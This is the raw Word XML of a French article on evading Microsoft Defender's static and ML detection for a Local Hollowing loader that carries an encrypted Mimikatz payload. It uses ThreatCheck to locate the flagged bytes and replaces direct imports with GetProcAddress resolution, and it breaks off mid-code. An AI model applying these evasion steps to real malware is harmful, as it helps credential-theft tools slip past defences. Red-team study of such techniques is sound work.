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47BA" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="600" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Bypass de la détection statique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275D7174" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OLLVM ne suffit pas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D64289" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="000C1804">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:after="400"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C361FB" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76929659" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dans un précédent article, nous avons détaillé le fonctionnement du Local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Hollowing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, une technique qui permet d'exécuter un PE malveillant en mémoire sans jamais l'écrire en clair sur le disque. Le loader est compilé avec OLLVM pour casser les signatures dans le code machine, et le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) est chiffré en AES-256.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709ECF10" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>En théorie, cette combinaison devrait suffire à contourner la détection statique. En pratique, Microsoft Defender détecte le loader immédiatement :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177A8709" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0382E7ED" wp14:editId="50082233">
            <wp:extent cx="5334000" cy="4000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000500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="529B1F3D" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Defender détecte le loader : </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Trojan:Win64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Zusy.LRC</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>!MTB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="240A3F21" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le suffixe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MTB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Machine Learning-Based Threat) indique que ce n'est pas une signature classique qui nous détecte, mais le modèle ML de Defender. Ce modèle analyse le PE dans son ensemble et pas </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>uniquement le code. OLLVM transforme les instructions machine, mais le ML regarde d'autres caractéristiques du binaire.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382491E8" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Cet article retrace la démarche itérative pour identifier et corriger chaque vecteur de détection, un par un, jusqu'à obtenir un bypass complet de la détection statique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFE3E9B" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Outil : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ThreatCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4DB4AB88" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ThreatCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> découpe un binaire en morceaux et les soumet un par un à Defender pour localiser exactement les bytes qui déclenchent la détection. Il retourne l'offset et le contenu problématique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2725578D" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="260" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ThreatCheck.exe -f LocalHollowing.exe -e Defender</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9C7936" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Itération 1 : l'IAT nous trahit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E30747" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le premier scan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ThreatCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sur le loader compilé avec OLLVM + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> chiffré embarqué :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279AEF88" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6314D3B8" wp14:editId="310B27D7">
            <wp:extent cx="5334000" cy="4000500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="647021068" name="Image 64702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4000500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE40BD8" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ThreatCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> identifie la détection à l'offset 0x2C7692 : les noms de fonctions importées en clair</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A75CB3" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Le dump est explicite. On retrouve en clair dans le binaire :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9C02FD" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="260" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SetThreadContext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F2B7415" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="260" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SuspendThread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0111311C" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="260" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TerminateProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B95ACBB" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="260" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08104633" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="260" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>VirtualProtect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7361BD59" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="000C1804">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07A9E4FA" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ce sont les noms des fonctions importées, stockés dans l'Import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Table (IAT) du PE. Quand le code appelle directement </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, le compilateur génère un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vers une entrée de l'IAT, et le linker ajoute le nom </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dans la table d'imports. OLLVM transforme le code autour de l'appel mais ne touche pas l'IAT, qui est générée par le linker, pas par le compilateur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC1FA67" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Defender ML voit la combinaison </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SetThreadContext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SuspendThread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CryptDecrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dans la même IAT et identifie un loader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB00201" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t>Correction : résolution dynamique des imports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A49D03C" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pour retirer ces noms de l'IAT, on remplace chaque appel direct par une résolution dynamique via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GetProcAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> au runtime. Au lieu d'écrire :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC6489D" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="260" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">LPVOID </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>VirtualAlloc</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NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0DDC9F6E" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="000C1804">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63DD041E" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>On écrit :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F3E5D7" w14:textId="77777777" w:rsidR="000C1804" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="260" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>typedef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> LPVOID (WINAPI *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>fn_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>LPVOID, SIZE_T, DWORD, DWORD</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="17C53503" w14:textId="77777777" w:rsidR="000C1804" w:rsidRPr="00E61249" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="260" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fn_VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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p_VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fn_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GetProcAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B2B2B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038F67A5"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GetModuleHandleA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E61249">
        <w:rPr>
